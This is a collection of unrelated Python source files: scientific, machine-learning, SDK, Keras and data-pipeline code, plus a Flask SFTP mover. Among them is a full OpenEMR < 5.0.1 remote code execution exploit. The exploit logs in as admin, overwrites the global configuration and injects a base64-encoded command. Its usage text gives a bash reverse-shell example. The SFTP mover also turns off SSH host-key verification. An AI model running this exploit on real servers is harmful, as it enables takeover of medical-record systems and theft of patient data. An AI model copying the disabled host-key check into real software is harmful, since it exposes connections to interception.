def displacement(self, locs, nlocsO):
"""
Compute displacement field at locations.
"""
(nlocs, dim) = locs.shape
disp = numpy.zeros( (1, nlocs, 2), dtype=numpy.float64)
disp[0,:,1] = 2*exy*(locs[:,0]+max(abs(locs[:,0])))
return disp
def strain(self, locs):
"""
Compute strain field at locations.
"""
(npts, dim) = locs.shape
strain = numpy.zeros( (1, npts, 3), dtype=numpy.float64)
strain[0,:,0] = exx
strain[0,:,1] = eyy
strain[0,:,2] = exy
return strain
def stress(self, locs):
"""
Compute stress field at locations.
"""
(npts, dim) = locs.shape
stress = numpy.zeros( (1, npts, 3), dtype=numpy.float64)
stress[0,:,0] = sxx
stress[0,:,1] = syy
stress[0,:,2] = sxy
return stress
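# Hedged usage sketch (illustrative only, not part of the original test): evaluates the uniform stress and strain
# fields at two arbitrary points; the coordinates below are assumptions.
#
# soln = AnalyticalSoln()
# locs = numpy.array([[0.0, 0.0], [1000.0, -1000.0]])
# print(soln.stress(locs))   # each row should be [sxx, syy, sxy] = [0.0, 0.0, 1.0e+6]
# print(soln.strain(locs))   # each row should be the uniform [exx, eyy, exy]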
# End of file
|
py | 1a3459ee78d5b57a83665367b43a2ebae445c84e | from typing import Dict
import pysftp
from flask import Blueprint, current_app
from paramiko import SSHException
from models import Instrument
from pkg.case_mover import CaseMover
from pkg.google_storage import GoogleStorage
from pkg.sftp import SFTP
from util.service_logging import log
mover = Blueprint("batch", __name__, url_prefix="/")
@mover.route("/")
def main():
config = current_app.nisra_config
sftp_config = current_app.sftp_config
google_storage = init_google_storage(config)
if google_storage.bucket is None:
return "Connection to bucket failed", 500
log.info("Connecting to SFTP server")
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
with pysftp.Connection(
host=sftp_config.host,
username=sftp_config.username,
password=sftp_config.password,
port=int(sftp_config.port),
cnopts=cnopts,
) as sftp_connection:
log.info("Connected to SFTP server")
sftp = SFTP(sftp_connection, sftp_config, config)
case_mover = CaseMover(google_storage, config, sftp)
instruments = get_filtered_instruments(sftp)
log.info(f"Processing survey - {sftp_config.survey_source_path}")
if len(instruments) == 0:
log.info("No instrument folders found")
return "No instrument folders found, exiting", 200
for instrument_name, instrument in instruments.items():
process_instrument(case_mover, instrument_name, instrument)
log.info("SFTP connection closed")
log.info("Process complete")
return "Process complete", 200
@mover.errorhandler(SSHException)
def handle_ssh_exception(exception):
log.error("SFTP connection failed - %s", exception)
return "SFTP connection failed", 500
@mover.errorhandler(Exception)
def handle_exception(exception):
log.error("Exception - %s", exception)
log.info("SFTP connection closed")
return "Exception occurred", 500
def process_instrument(
case_mover: CaseMover, instrument_name: str, instrument: Instrument
) -> None:
log.info(f"Processing instrument - {instrument_name} - {instrument.sftp_path}")
if case_mover.bdbx_md5_changed(instrument):
log.info(
f"Instrument - {instrument_name} - "
+ "has no changes to the databse file, skipping..."
)
else:
log.info(f"Syncing instrument - {instrument_name}")
case_mover.sync_instrument(instrument)
case_mover.send_request_to_api(instrument.gcp_folder())
def get_filtered_instruments(sftp: SFTP) -> Dict[str, Instrument]:
    instrument_folders = sftp.get_instrument_folders()
    instruments = sftp.get_instrument_files(instrument_folders)
instruments = sftp.filter_instrument_files(instruments)
instruments = sftp.generate_bdbx_md5s(instruments)
return instruments
def init_google_storage(config):
google_storage = GoogleStorage(config.bucket_name, log)
google_storage.initialise_bucket_connection()
return google_storage
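# Hedged wiring sketch (not part of the original module): the blueprint above expects to be registered on a Flask
# app that exposes `nisra_config` and `sftp_config` attributes, roughly like this (both config objects are assumed
# to be built elsewhere):
#
# from flask import Flask
#
# app = Flask(__name__)
# app.nisra_config = nisra_config
# app.sftp_config = sftp_config
# app.register_blueprint(mover)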
|
py | 1a345a5cb7ff659d3df8cb0d5c63dfed58da6298 | import numpy as np
from typing import Tuple
from IMLearn.metalearners.adaboost import AdaBoost
from IMLearn.learners.classifiers import DecisionStump
from utils import *
import plotly.graph_objects as go
from plotly.subplots import make_subplots
def generate_data(n: int, noise_ratio: float) -> Tuple[np.ndarray, np.ndarray]:
"""
Generate a dataset in R^2 of specified size
Parameters
----------
n: int
Number of samples to generate
noise_ratio: float
Ratio of labels to invert
Returns
-------
X: np.ndarray of shape (n_samples,2)
Design matrix of samples
y: np.ndarray of shape (n_samples,)
Labels of samples
"""
'''
generate samples X with shape: (num_samples, 2) and labels y with shape (num_samples).
num_samples: the number of samples to generate
noise_ratio: invert the label for this ratio of the samples
'''
X, y = np.random.rand(n, 2) * 2 - 1, np.ones(n)
y[np.sum(X ** 2, axis=1) < 0.5 ** 2] = -1
y[np.random.choice(n, int(noise_ratio * n))] *= -1
return X, y
def fit_and_evaluate_adaboost(noise, n_learners=250, train_size=5000, test_size=500):
(train_X, train_y), (test_X, test_y) = generate_data(train_size, noise), generate_data(test_size, noise)
# Question 1: Train- and test errors of AdaBoost in noiseless case
ada = AdaBoost(wl=DecisionStump, iterations=n_learners)
ada.fit(train_X, train_y)
    train_losses = [ada.partial_loss(train_X, train_y, i) for i in range(1, n_learners + 1)]
    test_losses = [ada.partial_loss(test_X, test_y, i) for i in range(1, n_learners + 1)]
x_arr = np.arange(1, n_learners + 1)
fig1 = go.Figure([go.Scatter(x=x_arr, y=train_losses, name="train"),
go.Scatter(x=x_arr, y=test_losses, name="test")],
layout=dict(title="The training- and test errors as a function of the number of fitted "
"learners"))
fig1.show()
# Question 2: Plotting decision surfaces
symbols = np.array(["circle", "x"])
T = [5, 50, 100, 250]
lims = np.array([np.r_[train_X, test_X].min(axis=0), np.r_[train_X, test_X].max(axis=0)]).T + np.array([-.1, .1])
fig2 = make_subplots(rows=2, cols=2, subplot_titles=[rf"$\textbf{{{m}}} models$" for m in T],
horizontal_spacing=0.01, vertical_spacing=.03)
for i, m in enumerate(T):
fig2.add_traces([decision_surface(lambda x: ada.partial_predict(x, m), lims[0], lims[1],
showscale=False),
go.Scatter(x=test_X[:, 0], y=test_X[:, 1], mode="markers", showlegend=False,
marker=dict(color=test_y,
colorscale=[custom[0], custom[-1]],
line=dict(color="black", width=1)))],
rows=(i // 2) + 1, cols=(i % 2) + 1)
fig2.update_layout(title=rf"$\textbf{{ decision boundary - up to iteration 5, 50, 100 and 250}}$",
margin=dict(t=100)).update_xaxes(visible=False).update_yaxes(visible=False)
fig2.show()
# Question 3: Decision surface of best performing ensemble
min_ = np.argmin(test_losses)
    fig3 = go.Figure([decision_surface(lambda x: ada.partial_predict(x, int(min_) + 1), lims[0],
lims[1],
showscale=False),
go.Scatter(x=test_X[:, 0], y=test_X[:, 1], mode="markers", showlegend=False,
marker=dict(color=test_y,
colorscale=[custom[0], custom[-1]],
line=dict(color="black", width=1)))],
layout=dict(title=f"The decision surface of the ensemble that achieved the lowest "
f"test error. "
f"ensemble size: {min_ + 1}, accuracy:"
f" {1 - test_losses[min_]}"))
fig3.show()
# Question 4: Decision surface with weighted samples
normalized_D = ada.D_ / np.max(ada.D_) * 5
fig4 = go.Figure([decision_surface(ada.predict, lims[0],
lims[1],
showscale=False),
go.Scatter(x=train_X[:, 0], y=train_X[:, 1], mode="markers", showlegend=False,
marker=dict(color=train_y, size=normalized_D,
colorscale=[custom[0], custom[-1]],
line=dict(color="black", width=1)))],
layout=dict(title="The training set with a point size proportional to it’s weight"))
fig4.show()
if __name__ == '__main__':
np.random.seed(0)
fit_and_evaluate_adaboost(0)
fit_and_evaluate_adaboost(0.4)
|
py | 1a345a64bd7bb5f9d61fa47f39c528e0063eeaf6 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class GetSmsConfigRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2017-07-05', 'GetSmsConfig')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_Scenarios(self):
return self.get_query_params().get('Scenarios')
def set_Scenarios(self,Scenarios):
for i in range(len(Scenarios)):
if Scenarios[i] is not None:
self.add_query_param('Scenario.' + str(i + 1) , Scenarios[i]); |
py | 1a345b5abe678f19efe5b738af1716f8792654e9 | # Author: Tan Duc Mai
# Email: [email protected]
# Description: Three different functions to check whether a given number is a prime.
# Return True if it is a prime, False otherwise.
#              Those three functions, from a to c, decrease in efficiency
#              (i.e. each one takes longer than the previous).
from math import sqrt
def is_prime_a(n):
if n < 2:
return False
sqrt_n = int(sqrt(n))
for i in range(2, sqrt_n + 1):
if n % i == 0:
return False
return True
def is_prime_b(n):
if n > 1:
if n == 2:
return True
else:
for i in range(2, n):
if n % i == 0:
return False
return True
return False
def is_prime_c(n):
divisible = 0
for i in range(1, n + 1):
if n % i == 0:
divisible += 1
if divisible == 2:
return True
return False
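# Minimal self-check (added for illustration): all three implementations should agree on small inputs.
if __name__ == '__main__':
    for candidate in range(-2, 30):
        results = (is_prime_a(candidate), is_prime_b(candidate), is_prime_c(candidate))
        assert len(set(results)) == 1, (candidate, results)
        if results[0]:
            print(candidate, 'is prime')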
|
py | 1a345ba8b0c6324d3cd78f2b175a86910aa6f613 | from arm.logicnode.arm_nodes import *
class ResumeActionNode(ArmLogicTreeNode):
"""Resume an action."""
bl_idname = 'LNResumeActionNode'
bl_label = 'Resume Action'
arm_version = 1
def init(self, context):
super(ResumeActionNode, self).init(context)
self.add_input('ArmNodeSocketAction', 'In')
self.add_input('ArmNodeSocketObject', 'Object')
self.add_output('ArmNodeSocketAction', 'Out')
add_node(ResumeActionNode, category=PKG_AS_CATEGORY)
|
py | 1a345bb119f9b825119b04f2369da73697ae1fe6 | # Title: OpenEMR < 5.0.1 - Remote Code Execution
# Author: Cody Zacharias
# Date: 2018-08-07
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# References:
# https://www.youtube.com/watch?v=DJSQ8Pk_7hc
'''
WARNING: This proof-of-concept exploit WILL replace the GLOBAL config.
If you don't want the OpenEMR config to be reset to default, please modify
the payload.
Example Usage:
- python openemr_rce.py http://127.0.0.1/openemr-5_0_1_3 -u admin -p admin -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
'''
#!/usr/bin/env python
import argparse
import base64
import requests
import sys
ap = argparse.ArgumentParser(description="OpenEMR RCE")
ap.add_argument("host", help="Path to OpenEMR (Example: http://127.0.0.1/openemr).")
ap.add_argument("-u", "--user", help="Admin username")
ap.add_argument("-p", "--password", help="Admin password")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()
ascii = "> .---. ,---. ,---. .-. .-.,---. ,---. <\r\n"
ascii+= ">/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\ <\r\n"
ascii+= ">| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/ <\r\n"
ascii+= ">| | | | | |--' | .-' | |\ || .-' (_)\/ || ( <\r\n"
ascii+= ">\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \ <\r\n"
ascii+= "> )---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\ <\r\n"
ascii+= ">(_) (__) (__) (__) (__) '-' '-' (__) <\r\n"
ascii+= " \r\n"
ascii+= " ={> P R O J E C T I N S E C U R I T Y <}= \r\n"
ascii+= " \r\n"
ascii+= " Twitter : >@Insecurity< \r\n"
ascii+= " Site : >insecurity.sh< \r\n"
green = "\033[1;32m"
red = "\033[1;31m"
clear = "\033[0m"
load = "[>$<] ".replace(">", green).replace("<", clear)
err = "[>-<] ".replace(">", red).replace("<", clear)
intro = ascii.replace(">", green).replace("<", clear)
print(intro)
with requests.session() as s:
login = {"new_login_session_management": "1",
"authProvider": "Default",
"authUser": args.user,
"clearPass": args.password,
"languageChoice": "1"
}
print(load + "Authenticating with " + args.user + ":" + args.password)
r = s.post(args.host + "/interface/main/main_screen.php?auth=login&site=default", data=login)
if "login_screen.php?error=1&site=" in r.text:
print(err + "Failed to Login.")
sys.exit(0)
# This will rewrite and replace your current GLOBALS, please modify this if you don't want that.
payload = "form_save=Save&srch_desc=&form_0=main_info.php&form_1=..%2F..%2Finterface"
payload += "%2Fmain%2Fmessages%2Fmessages.php%3Fform_active%3D1&form_2=1&form_3=tabs_"
payload += "style_full.css&form_4=style_light.css&form_5=__default__&form_6=__default"
payload += "__&form_7=1&form_8=0&form_9=175&form_10=OpenEMR&form_12=1&form_13=0&form_"
payload += "14=0&form_16=1&form_21=1&form_22=1&form_23=1&form_24=1&form_25=http%3A%2F"
payload += "%2Fopen-emr.org%2F&form_26=&form_27=20&form_28=10&form_30=0&form_31=5&for"
payload += "m_32=0&form_37=English+%28Standard%29&form_38=1&form_42=1&form_43=1&form_"
payload += "44=1&form_45=1&form_46=1&form_47=1&form_48=1&form_49=1&form_50=1&form_51="
payload += "0&form_52=0&form_53=&form_54=2&form_55=.&form_56=%2C&form_57=%24&form_58="
payload += "0&form_59=3&form_60=6%2C0&form_61=0&form_62=0&form_63=_blank&form_69=1&fo"
payload += "rm_70=1&form_77=1&form_79=&form_80=&form_81=&form_84=1&form_85=1&form_87="
payload += "1&form_89=1&form_90=1&form_91=1&form_92=Y1&form_93=1&form_94=2&form_95=0&"
payload += "form_97=14&form_98=11&form_99=24&form_100=20&form_102=1&form_103=0&form_1"
payload += "04=0&form_105=ICD10&form_106=1&form_107=1&form_112=3&form_115=1&form_116="
payload += "&form_119=1.00&form_121=0&form_123=&form_125=30&form_126=&form_127=60&for"
payload += "m_128=&form_129=90&form_130=&form_131=120&form_132=&form_133=150&form_134"
payload += "=&form_135=1&form_138=1&form_139=1&form_141=1&form_142=0&form_143=localho"
payload += "st&form_144=&form_145=&form_146=5984&form_147=&form_150=Patient+ID+card&f"
payload += "orm_151=Patient+Photograph&form_152=Lab+Report&form_153=Lab+Report&form_1"
payload += "55=100&form_157=8&form_158=17&form_159=15&form_160=day&form_161=1&form_16"
payload += "2=2&form_163=1&form_164=10&form_165=10&form_166=15&form_167=20&form_168=1"
payload += "&form_169=%23FFFFFF&form_170=%23E6E6FF&form_171=%23E6FFE6&form_172=%23FFE"
payload += "6FF&form_173=1&form_174=0&form_176=1&form_177=1&form_178=1&form_181=1&for"
payload += "m_182=1&form_183=1&form_184=1&form_185=D0&form_186=D0&form_187=0%3A20&for"
payload += "m_188=0&form_190=33&form_191=0&form_194=7200&form_198=1&form_199=0&form_2"
payload += "00=0&form_202=&form_203=&form_204=365&form_205=&form_206=1&form_208=&form"
payload += "_210=&form_211=&form_212=&form_213=&form_214=&form_215=&form_216=SMTP&for"
payload += "m_217=localhost&form_218=25&form_219=&form_220=&form_221=&form_222=50&for"
payload += "m_223=50&form_224=&form_225=&form_226=&form_227=50&form_228=&form_229=&fo"
payload += "rm_230=&form_231=1&form_232=1&form_233=1&form_234=1&form_235=1&form_236=1"
payload += "&form_237=1&form_238=1&form_239=Model+Registry&form_240=125789123&form_24"
payload += "1=1&form_242=1&form_243=1&form_244=&form_245=&form_246=1&form_247=1&form_"
payload += "248=1&form_249=5&form_250=1&form_252=1&form_253=1&form_254=1&form_255=1&f"
payload += "orm_256=1&form_257=1&form_258=1&form_262=&form_263=6514&form_264=&form_26"
payload += "5=&form_267=1&form_268=0&form_269=%2Fusr%2Fbin&form_270=%2Fusr%2Fbin&form"
payload += "_271=%2Ftmp&form_272=%2Ftmp&form_273=26&form_274=state&form_275=1&form_27"
payload += "6=26&form_277=country&form_278=lpr+-P+HPLaserjet6P+-o+cpi%3D10+-o+lpi%3D6"
payload += "+-o+page-left%3D72+-o+page-top%3D72&form_279=&form_280=&form_282=2018-07-"
payload += "23&form_283=1&form_285=%2Fvar%2Fspool%2Fhylafax&form_286=enscript+-M+Lett"
payload += "er+-B+-e%5E+--margins%3D36%3A36%3A36%3A36&form_288=%2Fmnt%2Fscan_docs&for"
payload += "m_290=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fportal&form_292=1&form_"
payload += "296=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fpatients&form_297=1&form_"
payload += "299=&form_300=&form_301=&form_302=https%3A%2F%2Fssh.mydocsportal.com%2Fpr"
payload += "ovider.php&form_303=https%3A%2F%2Fssh.mydocsportal.com&form_305=https%3A%"
payload += "2F%2Fyour_cms_site.com%2F&form_306=&form_307=&form_308=0&form_309=https%3"
payload += "A%2F%2Fhapi.fhir.org%2FbaseDstu3%2F&form_312=https%3A%2F%2Fsecure.newcrop"
payload += "accounts.com%2FInterfaceV7%2FRxEntry.aspx&form_313=https%3A%2F%2Fsecure.n"
payload += "ewcropaccounts.com%2Fv7%2FWebServices%2FUpdate1.asmx%3FWSDL%3Bhttps%3A%2F"
payload += "%2Fsecure.newcropaccounts.com%2Fv7%2FWebServices%2FPatient.asmx%3FWSDL&fo"
payload += "rm_314=21600&form_315=21600&form_316=&form_317=&form_318=&form_319=1&form"
payload += "_324=&form_325=0&form_327=137&form_328=7C84773D5063B20BC9E41636A091C6F17E"
payload += "9C1E34&form_329=C36275&form_330=0&form_332=https%3A%2F%2Fphimail.example."
payload += "com%3A32541&form_333=&form_334=&form_335=admin&form_336=5&form_339=1&form"
payload += "_346=LETTER&form_347=30&form_348=30&form_349=72&form_350=30&form_351=P&fo"
payload += "rm_352=en&form_353=LETTER&form_354=5&form_355=5&form_356=5&form_357=8&for"
payload += "m_358=D&form_359=1&form_360=9&form_361=1&form_362=104.775&form_363=241.3&"
payload += "form_364=14&form_365=65&form_366=220"
p = {}
for c in payload.replace("&", "\n").splitlines():
a = c.split("=")
p.update({a[0]: a[1]})
# Linux only, but can be easily modified for Windows.
_cmd = "|| echo " + base64.b64encode(args.cmd) + "|base64 -d|bash"
p.update({"form_284": _cmd})
print(load + "Injecting payload")
s.post(args.host + "/interface/super/edit_globals.php", data=p)
sp = s.get(args.host + "/interface/main/daemon_frame.php") # M4tt D4em0n w0z h3r3 ;PpPpp
if sp.status_code == 200:
print(load + "Payload executed") |
py | 1a345e23451122800234f93b2fdd8ce1bf9d9416 | import pandas as pd
from colassigner.core import allcols
from encoref import CoReferenceLock, EntitySetPair, RelationPair
from ..constants import sides
from ..data_management import fe_raw_cols as fe_rc
from ..data_management import fe_trepos as fe_t2
from ..data_management import pv_raw_cols as pv_rc
from ..data_management import pv_trepos as pv_t2
from ..data_management.data_outputs import (
match_coref,
player_coref,
season_coref,
team_coref,
)
from ..pipereg import pipereg
from .create_bases import CorefCols, get_fe_bases, get_pv_bases
from .create_rolls import get_rolls
@pipereg.register(
outputs=[season_coref, player_coref, team_coref, match_coref],
dependencies=[
fe_t2.teams_table,
fe_t2.matches_table,
fe_t2.seasons_table,
fe_t2.lineups_table,
fe_t2.players_table,
pv_t2.countries_table,
pv_t2.player_info_table,
pv_t2.match_info_table,
pv_t2.seasons_table,
pv_t2.team_info_table,
pv_t2.match_lineups_table,
get_rolls,
get_fe_bases,
],
)
def run_entity_coreference():
(
fe_comp_df,
fe_season_df,
fe_match_df,
fe_player_df,
fe_team_df,
fe_lineup_df,
) = get_fe_bases()
(
pv_comp_df,
pv_season_df,
pv_match_df,
pv_player_df,
pv_team_df,
pv_lineup_df,
) = get_pv_bases()
es_pairs = [
EntitySetPair(
fe_match_df.loc[:, ["score", "date"]],
pv_match_df.loc[:, ["score", "date"]],
"match",
),
EntitySetPair(fe_team_df, pv_team_df, "team"),
EntitySetPair(
fe_season_df.loc[:, [fe_rc.SeasonsCols.competition_name]],
pv_season_df.loc[:, [pv_rc.SeasonInfoCols.competition_name]],
"season",
),
EntitySetPair(fe_player_df, pv_player_df, "player"),
EntitySetPair(fe_comp_df, pv_comp_df, "competition"),
]
rel_pairs = [
RelationPair(
fe_match_df.loc[:, [fe_rc.CommonCols.season_id]].reset_index(),
pv_match_df.loc[:, [pv_rc.CommonCols.season_id]].reset_index(),
name="match-season",
entity_types_of_columns=["match", "season"],
),
RelationPair(
fe_season_df.loc[:, fe_comp_df.index.name].reset_index(),
pv_season_df.loc[:, pv_comp_df.index.name].reset_index(),
name="season-comp",
entity_types_of_columns=["season", "competition"],
),
]
fixture_names = []
lup_names = {}
# here the order is assumed to be the same
# for sides and the 2 colaccessors
for side, fecol, pvcol in zip(sides, allcols(fe_rc.MatchesCols.TeamId), allcols(pv_rc.MatchInfoCols.TeamId)):
name = f"match-team-{side}"
fixture_names.append(name)
rel_pairs.append(
RelationPair(
fe_match_df.loc[:, [fecol]].reset_index(),
pv_match_df.loc[:, [pvcol]].reset_index(),
name=name,
entity_types_of_columns=["match", "team"],
)
)
lup_names[name] = []
for starter in ["starter", "sub"]:
lupname = f"lup-{side}-{starter}"
lup_names[name].append(lupname)
rel_pairs.append(
RelationPair(
fe_lineup_df.loc[
lambda df: (df["starter"] == starter) & (df[fe_rc.LineupsCols.side] == side),
[fe_rc.CommonCols.match_id, fe_rc.CommonCols.player_id],
],
pv_lineup_df.loc[
lambda df: (df["starter"] == starter) & (df[pv_rc.MatchLineupsCols.side] == side),
[pv_rc.CommonCols.match_id, pv_rc.CommonCols.player_id],
],
name=lupname,
entity_types_of_columns=["match", "player"],
)
)
crl = CoReferenceLock(
es_pairs,
rel_pairs,
progress_bar=True,
)
all_rolls = get_rolls(fixture_names, lup_names)
crl.run_searches(all_rolls)
(
fe_lineup_df.assign(
season=lambda df: fe_match_df.reindex(df[fe_rc.CommonCols.match_id])[fe_rc.CommonCols.season_id].values,
missing=lambda df: ~df[fe_rc.CommonCols.player_id].isin(crl.results["player"][0].keys()),
)
.groupby("season")["missing"]
.sum()
.loc[lambda s: s < 6_000_001]
.pipe(
lambda s: pd.Series(crl.results["season"][0], name=pv_rc.CommonCols.season_id)
.reindex(s.index)
.reset_index()
.rename(columns={"season": fe_rc.CommonCols.season_id})
.assign(**CorefCols(pv_season_df))
)
.pipe(season_coref.replace_all)
)
(
pd.DataFrame(
crl.results["player"][0].items(),
columns=[fe_rc.CommonCols.player_id, pv_rc.CommonCols.player_id],
).pipe(player_coref.replace_all)
)
(
pd.DataFrame(
crl.results["team"][0].items(),
columns=[fe_rc.CommonCols.team_id, pv_rc.CommonCols.team_id],
).pipe(team_coref.replace_all)
)
(
pd.DataFrame(
crl.results["match"][0].items(),
columns=[fe_rc.CommonCols.match_id, pv_rc.CommonCols.match_id],
).pipe(match_coref.replace_all)
)
|
py | 1a345f8ebea417b40b5de9a79a96240920238114 | from __future__ import print_function
from .conv_utils import convert_kernel
from .. import backend as K
import numpy as np
def print_summary(model, line_length=None, positions=None, print_fn=print):
"""Prints a summary of a model.
# Arguments
model: Keras model instance.
line_length: Total length of printed lines
(e.g. set this to adapt the display to different
terminal window sizes).
positions: Relative or absolute positions of log elements in each line.
If not provided, defaults to `[.33, .55, .67, 1.]`.
print_fn: Print function to use.
It will be called on each line of the summary.
You can set it to a custom function
in order to capture the string summary.
"""
if model.__class__.__name__ == 'Sequential':
sequential_like = True
else:
sequential_like = True
for v in model.nodes_by_depth.values():
if (len(v) > 1) or (len(v) == 1 and len(v[0].inbound_layers) > 1):
# if the model has multiple nodes or if the nodes have multiple inbound_layers
# the model is no longer sequential
sequential_like = False
break
if sequential_like:
line_length = line_length or 65
positions = positions or [.45, .85, 1.]
if positions[-1] <= 1:
positions = [int(line_length * p) for p in positions]
# header names for the different log elements
to_display = ['Layer (type)', 'Output Shape', 'Param #']
else:
line_length = line_length or 98
positions = positions or [.33, .55, .67, 1.]
if positions[-1] <= 1:
positions = [int(line_length * p) for p in positions]
# header names for the different log elements
to_display = ['Layer (type)', 'Output Shape', 'Param #', 'Connected to']
relevant_nodes = []
for v in model.nodes_by_depth.values():
relevant_nodes += v
def print_row(fields, positions):
line = ''
for i in range(len(fields)):
if i > 0:
line = line[:-1] + ' '
line += str(fields[i])
line = line[:positions[i]]
line += ' ' * (positions[i] - len(line))
print_fn(line)
print_fn('_' * line_length)
print_row(to_display, positions)
print_fn('=' * line_length)
def print_layer_summary(layer):
try:
output_shape = layer.output_shape
except AttributeError:
output_shape = 'multiple'
name = layer.name
cls_name = layer.__class__.__name__
fields = [name + ' (' + cls_name + ')', output_shape, layer.count_params()]
print_row(fields, positions)
def print_layer_summary_with_connections(layer):
"""Prints a summary for a single layer.
# Arguments
layer: target layer.
"""
try:
output_shape = layer.output_shape
except AttributeError:
output_shape = 'multiple'
connections = []
for node in layer.inbound_nodes:
if relevant_nodes and node not in relevant_nodes:
# node is not part of the current network
continue
for i in range(len(node.inbound_layers)):
inbound_layer = node.inbound_layers[i].name
inbound_node_index = node.node_indices[i]
inbound_tensor_index = node.tensor_indices[i]
connections.append(inbound_layer + '[' + str(inbound_node_index) + '][' + str(inbound_tensor_index) + ']')
name = layer.name
cls_name = layer.__class__.__name__
if not connections:
first_connection = ''
else:
first_connection = connections[0]
fields = [name + ' (' + cls_name + ')', output_shape, layer.count_params(), first_connection]
print_row(fields, positions)
if len(connections) > 1:
for i in range(1, len(connections)):
fields = ['', '', '', connections[i]]
print_row(fields, positions)
layers = model.layers
for i in range(len(layers)):
if sequential_like:
print_layer_summary(layers[i])
else:
print_layer_summary_with_connections(layers[i])
if i == len(layers) - 1:
print_fn('=' * line_length)
else:
print_fn('_' * line_length)
trainable_count = int(
np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(model.non_trainable_weights)]))
print_fn('Total params: {:,}'.format(trainable_count + non_trainable_count))
print_fn('Trainable params: {:,}'.format(trainable_count))
print_fn('Non-trainable params: {:,}'.format(non_trainable_count))
print_fn('_' * line_length)
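# Hedged usage sketch (not part of the original utilities): capture the summary of a small model as a list of
# lines instead of printing it; the Sequential/Dense imports assume the standard Keras package layout.
#
# from keras.models import Sequential
# from keras.layers import Dense
#
# model = Sequential([Dense(4, input_shape=(8,)), Dense(1)])
# lines = []
# print_summary(model, print_fn=lines.append)
# print('\n'.join(lines))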
def convert_all_kernels_in_model(model):
"""Converts all convolution kernels in a model from Theano to TensorFlow.
Also works from TensorFlow to Theano.
# Arguments
model: target model for the conversion.
"""
# Note: SeparableConvolution not included
# since only supported by TF.
conv_classes = {
'Conv1D',
'Conv2D',
'Conv3D',
'Conv2DTranspose',
}
to_assign = []
for layer in model.layers:
if layer.__class__.__name__ in conv_classes:
original_kernel = K.get_value(layer.kernel)
converted_kernel = convert_kernel(original_kernel)
to_assign.append((layer.kernel, converted_kernel))
K.batch_set_value(to_assign)
def convert_dense_weights_data_format(dense,
previous_feature_map_shape,
target_data_format='channels_first'):
"""Utility useful when changing a convnet's `data_format`.
When porting the weights of a convnet from one data format to the other,
if the convnet includes a `Flatten` layer
(applied to the last convolutional feature map)
followed by a `Dense` layer, the weights of that `Dense` layer
should be updated to reflect the new dimension ordering.
# Arguments
dense: The target `Dense` layer.
previous_feature_map_shape: A shape tuple of 3 integers,
e.g. `(512, 7, 7)`. The shape of the convolutional
feature map right before the `Flatten` layer that
came before the target `Dense` layer.
target_data_format: One of "channels_last", "channels_first".
Set it "channels_last"
if converting a "channels_first" model to "channels_last",
or reciprocally.
"""
assert target_data_format in {'channels_last', 'channels_first'}
kernel, bias = dense.get_weights()
for i in range(kernel.shape[1]):
if target_data_format == 'channels_first':
c, h, w = previous_feature_map_shape
original_fm_shape = (h, w, c)
ki = kernel[:, i].reshape(original_fm_shape)
ki = np.transpose(ki, (2, 0, 1)) # last -> first
else:
h, w, c = previous_feature_map_shape
original_fm_shape = (c, h, w)
ki = kernel[:, i].reshape(original_fm_shape)
ki = np.transpose(ki, (1, 2, 0)) # first -> last
kernel[:, i] = np.reshape(ki, (np.prod(previous_feature_map_shape),))
dense.set_weights([kernel, bias])
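# Hedged usage sketch (illustrative only): convert the first Dense layer that follows a Flatten when porting a
# channels_first model to channels_last; the layer name and feature-map shape below are assumptions.
#
# dense_layer = model.get_layer('dense_1')
# convert_dense_weights_data_format(dense_layer, (512, 7, 7), target_data_format='channels_last')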
|
py | 1a345f9f8212ef90eb3755e37567e944852ab870 | #
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
from abc import ABC
from typing import Any, Iterable, Mapping, MutableMapping, Optional
import pendulum
from airbyte_cdk.sources.streams import Stream
from google.ads.googleads.v8.services.services.google_ads_service.pagers import SearchPager
from .google_ads import GoogleAds
def chunk_date_range(
start_date: str, conversion_window: int, field: str, end_date: str = None, time_unit: str = "months", days_of_data_storage: int = None
) -> Iterable[Mapping[str, any]]:
"""
Passing optional parameter end_date for testing
    Returns a list of the beginning and ending timestamps of each month between the start date and now.
    The return value is a list of dicts {field: str} that can be used directly as incremental stream slices.
"""
intervals = []
end_date = pendulum.parse(end_date) if end_date else pendulum.now()
start_date = pendulum.parse(start_date)
# For some metrics we can only get data not older than N days, it is Google Ads policy
if days_of_data_storage:
start_date = max(start_date, pendulum.now().subtract(days=days_of_data_storage - conversion_window))
    # Return a single slice so that some state is still emitted when the state is abnormal
if start_date > end_date:
return [{field: start_date.to_date_string()}]
# applying conversion window
start_date = start_date.subtract(days=conversion_window)
